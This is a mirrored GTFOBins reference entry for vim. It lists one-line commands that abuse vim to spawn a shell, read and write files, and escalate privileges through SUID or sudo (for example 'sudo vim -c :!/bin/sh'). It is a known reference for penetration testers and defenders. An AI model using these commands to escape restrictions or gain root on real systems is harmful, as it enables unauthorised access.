1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-23 12:32:09 +02:00
GTFOBins.github.io/_gtfobins/vim.md
2018-08-17 17:16:09 +02:00

351 B

functions
execute-interactive file-write file-read suid-enabled sudo-enabled
code
vim -c ':!/bin/sh'
code
vim :set shell=/bin/sh :shell
code
vim file_to_write w
code
vim file_to_read
code
./vim -c ':!/bin/sh -p'
code
sudo vim -c ':!/bin/sh'